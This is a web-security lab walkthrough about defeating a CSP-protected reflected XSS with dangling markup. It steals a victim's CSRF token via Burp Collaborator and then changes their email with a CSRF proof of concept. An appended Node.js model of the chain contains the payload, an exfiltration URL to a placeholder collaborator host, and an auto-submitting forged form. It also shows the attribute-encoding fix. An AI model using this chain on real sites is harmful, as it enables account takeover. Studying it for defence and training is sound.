Lab: Reflected XSS protected by CSP, with dangling markup attack
You can log in to your own account using the following credentials:
To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use the provided exploit server and/or Burp Collaborator's default public server (
- Log in to the lab using the account provided above.
- Examine the "Update email" function. Observe that there is an XSS vulnerability in the
- Go to the Burp menu and launch the Burp Collaborator client.
- Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.
- Back in the lab, go to the exploit server and add the following code, replacing "your-lab-id" with your lab ID, and replacing "your-collaborator-id" with the payload that you just copied from Burp Collaborator.
- Click "Store" and then "Deliver exploit to victim". If the target user visits the website containing this malicious script while they are still logged in to the lab website, their browser will send a request containing their CSRF token to your malicious website. You can then steal this token using the Burp Collaborator client.
- Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again. You should see an HTTP interaction that was initiated by the application. Select the HTTP interaction, go to the "Request" tab, and copy the user's CSRF token.
- With Burp's intercept feature switched on, go back to the update email function of the lab and submit a request to change the email to any random address.
- In Burp, go to the intercepted request and change the value of the email parameter to
- Right-click on the request and, from the context menu, select "Engagement tools" and then "Generate CSRF PoC". The popup shows both the request and the CSRF HTML that is generated by it. In the request, replace the CSRF token with the one that you stole from the victim earlier.
- Click "Options" and make sure that "Include auto-submit script" is selected.
- Click "Regenerate" to update the CSRF HTML so that it contains the stolen token, then click "Copy HTML" to save it to your clipboard.
- Drop the request and switch off the intercept feature.
- Go back to the exploit server and paste the CSRF HTML into the body. You can overwrite the script that we entered earlier.
- Click "Store" and "Deliver exploit to victim". The user's email will be changed to
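The chain the steps above describe, modelled end to end as an added example that is not part of the lab page or of PortSwigger's solution code. It runs under Node.js and shows, on a constructed copy of the "my-account" form, why an unescaped reflection inside an HTML attribute lets a dangling-markup payload swallow the rest of the page (CSRF token included) without executing any script on the lab origin, which is why a script-blocking CSP does not stop it; it then pulls the token out of the captured text, builds the exfiltration request the victim's browser would send, and assembles an auto-submitting CSRF proof of concept of the kind Burp's generator produces. The hostnames, the /my-account/change-email path, the field names, the token value and the exact payload form are all assumptions made for the example; the hardened rendering beside the vulnerable one shows the attribute encoding that closes the hole.

```javascript
// Added example, not from the PortSwigger lab page. Models the dangling-markup
// attack against a constructed, hypothetical "my-account" template, then the
// token theft and CSRF PoC that follow. All paths, names and hosts are assumed.

const CSRF_TOKEN = "f3a1c0de-constructed-sample-token"; // constructed sample value
const LAB_ORIGIN = "https://your-lab-id.example";          // placeholder origin
const COLLABORATOR_HOST = "your-collaborator-id.example";  // placeholder host

// Hypothetical vulnerable template: the ?email= value is reflected inside
// value="..." with no encoding, and the CSRF token appears later in the page.
function renderVulnerable(email) {
  return [
    '<form class="login-form" action="/my-account/change-email" method="POST">',
    `  <input required type="email" name="email" value="${email}">`,
    `  <input required type="hidden" name="csrf" value="${CSRF_TOKEN}">`,
    '  <button class="button" type="submit">Update email</button>',
    "</form>",
  ].join("\n");
}

// Hardened variant: the same template, but the untrusted value is
// attribute-encoded before it is reflected. '&' must be replaced first.
function escapeHtmlAttr(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}
function renderHardened(email) {
  return renderVulnerable(escapeHtmlAttr(email));
}

// Assumed payload shape: close the value attribute, inject a link to the
// attacker's page, then open a target attribute that is never closed.
// No script runs on the target origin, so a CSP that blocks inline script
// does not interfere.
const PAYLOAD =
  `"><a href="https://your-exploit-server-id.example/exploit">Click me</a><base target='`;
const DANGLING_MARKER = "<base target='";

// Minimal model of the tokenizer rule the attack relies on: a quoted attribute
// value runs to the next matching quote, or to end of input if none follows.
// In a browser that text becomes the link's target name, i.e. window.name of
// the page opened when the victim clicks, which the attacker's page can read.
function swallowedByDanglingAttribute(html) {
  const start = html.indexOf(DANGLING_MARKER);
  if (start === -1) return null; // the injected tag never became markup
  const from = start + DANGLING_MARKER.length;
  const end = html.indexOf("'", from);
  return end === -1 ? html.slice(from) : html.slice(from, end);
}

// What the attacker's page does with the captured text: recover the token and
// build the request the victim's browser will make to the attacker's host.
function extractCsrfToken(captured) {
  const m = /name="csrf"\s+value="([^"]+)"/.exec(captured || "");
  return m ? m[1] : null;
}
function exfiltrationUrl(captured) {
  return `https://${COLLABORATOR_HOST}/?${encodeURIComponent(captured)}`;
}

// Auto-submitting CSRF proof of concept carrying the stolen token (assumed
// form, written here by hand rather than taken from Burp's generator).
function buildCsrfPoc(token, newEmail) {
  return [
    "<html><body>",
    `<form action="${LAB_ORIGIN}/my-account/change-email" method="POST">`,
    `  <input type="hidden" name="email" value="${escapeHtmlAttr(newEmail)}">`,
    `  <input type="hidden" name="csrf" value="${escapeHtmlAttr(token)}">`,
    "</form>",
    "<script>document.forms[0].submit();</script>",
    "</body></html>",
  ].join("\n");
}

// Run the whole chain against a given renderer and return every intermediate.
function attackChain(render) {
  const captured = swallowedByDanglingAttribute(render(PAYLOAD));
  const token = extractCsrfToken(captured);
  return {
    captured,
    token,
    exfil: captured ? exfiltrationUrl(captured) : null,
    poc: token ? buildCsrfPoc(token, "attacker@evil.example") : null,
  };
}

console.log("vulnerable template, stolen token:", attackChain(renderVulnerable).token);
console.log("hardened template, stolen token:", attackChain(renderHardened).token);
```

The capture stops at the next single quote, so a real payload has to use whichever quote style does not recur between the injection point and the token; the example page contains none, which is why the whole tail is swallowed. The encoded rendering never yields a `<base` tag at all, so there is nothing for the tokenizer to leave dangling.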